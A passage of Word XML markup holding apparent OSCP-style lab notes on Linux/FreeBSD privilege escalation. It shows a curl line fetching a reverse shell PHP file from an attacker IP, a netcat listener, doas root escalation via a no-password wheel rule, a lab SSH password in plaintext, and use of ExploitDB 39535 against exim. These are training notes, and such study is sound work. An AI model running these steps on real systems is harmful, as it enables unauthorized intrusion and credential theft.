    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FA">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So, now we should cd into document root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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cd /usr/local/www/apache24/data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FC">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And now, we can put reverse shell into here, and then visit it manually. but we have to first find a location we can write the reverse shell into.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FD">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After enumerating, we find we can write to /phpMyAdmin/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FE">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cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/www/apache24/data/phpMyAdmin/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000021FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>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curl</w:t>
      </w:r>
      <w:hyperlink r:id="rId730">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId731">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.45.232/rev.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o rev.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002200">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And then start listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002201">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rlwrap nc -lvnp 444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002202">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Then visit the site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002203">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http://172.16.xxx.20/phpMyAdmin/tmp/rev.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002204">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After getting a shell back as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">!!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002205">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we see that www-data user is part of wheel group (using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) so that means they can run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">doas </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root (as shown in the config file). You can actually </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">priv esc to root on www</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, but the shell is weak and hard to upgrade. But if you want to priv esc on www-data, here it is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002206">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002207">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 Alternatively, if we want a stronger shell (although it might be stronger in your case if you're doing another box) we can add andrew to wheel since it has stronger SSH connection. And adding him to the wheel group allows how to run doas as a root for any command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002208">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The line in the config file that that says that any wheel member can run doas as root is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002209">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>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permit nopass :wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This says any wheel member can run doas as root and no password required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the lack of the word "as michael" or something like that means it defaults to root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas pw usermod andrew -G wheel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this on www-data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But warning: this replaces the user’s group memberships — it doesn't append.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000220F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if andrew was part of other groups, they’ll be removed unless you include them. In this case it didn't matter though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002210">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002211">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Then after you add it, you can run either on andrew to get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002212">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas /bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002213">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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/usr/local/bin/doas csh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002214">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If this doesn't work, try not adding the full path to doas and just run "doas" without any path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002215">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Starts a root shell using C Shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002216">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a lot more interactive than weak /bin/sh unless you update it to python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002217">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Then, go look at all the hidden files in /home/mountuser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002218">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside of .history file is credentials for SSH for mountuser on .121</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002219">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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sshpass -p "DRtajyCwcbWvH/9" ssh mountuser@172.16.10.21</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c753kmj1ud02" w:id="300"/>
      <w:bookmarkEnd w:id="300"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">screen-4.5.0 with SUID bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP-A .143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000221F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at OSCP-A writeup since there were a lot of error while compiling the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002220">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002221">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1b73j617motb" w:id="301"/>
      <w:bookmarkEnd w:id="301"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exim-4.84-3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002222">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/sbin/exim-4.84-3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was exploited in the Tib3rius Video. There was an exploit on exploitDB, which was ExploitDB 39535. And when they ran the exploit, they got this error about ^M. To fix it, do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002223">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sed -e "s/^M//" 39535.sh &gt; privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002224">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then execute the new file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002225">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod + privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002226">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./privesc.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002227">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="819"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file:///C:/Users/Micha/Downloads/Linux%20Privilege%20Escalation-1.pdf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for more info</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002228">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002229">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g2p68pab8t16" w:id="302"/>
      <w:bookmarkEnd w:id="302"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aria2c (/usr/bin/aria2c)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000222C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId732">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Assertion101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/aria2c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
